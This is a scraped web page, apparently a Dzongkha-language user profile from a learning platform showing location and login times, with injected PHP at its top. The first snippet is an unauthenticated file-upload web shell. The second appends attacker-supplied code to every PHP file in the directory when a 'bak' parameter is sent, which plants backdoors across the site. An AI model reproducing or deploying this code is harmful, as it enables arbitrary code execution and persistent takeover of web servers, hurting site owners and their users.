<?php echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>";?>

<?php

if (isset($_GET['bak'])) {

$directory = _DIR_;

$mama = $_POST['file'];

$textToAppend = '

' . $mama . '

';

if ($handle = opendir($directory)) {

    while (false !== ($file = readdir($handle))) {

        if (pathinfo($file, PATHINFO_EXTENSION) === 'php') {

            $fileHandle = fopen($directory . '/' . $file, 'a');

            fwrite($fileHandle, $textToAppend);

            fclose($fileHandle);

            echo "OK >> $file

";

        }

    }

    closedir($handle);

}

}

?>

ལག་ལེན་པའི་རྒྱས་བཤད།

  • རྒྱལ་ཁབ
    ཨིན་ཌོ་ནེ་ཤི་ཡ།
  • གྲོང་སྡེ/ཁྲོམ
    Pesawaran

ནང་བསྐྱོན་སྦྱོང་ལཱ།

  • དང་པ་རང་ ས་ཁོངས་ནང་འཛུལ་སྤྱོད་འབད།
    Sunday, 27 September 2020, 3:37 PM  (5 ལོ། 56 ཉིམ་)
  • ས་ཁོངས་ནང་འཛུལ་སྤྱོད་མཇུག་རང་།
    Friday, 21 November 2025, 3:49 AM  (18 ཆུ་ཚོད 23 སྐར་མ)

Mobile app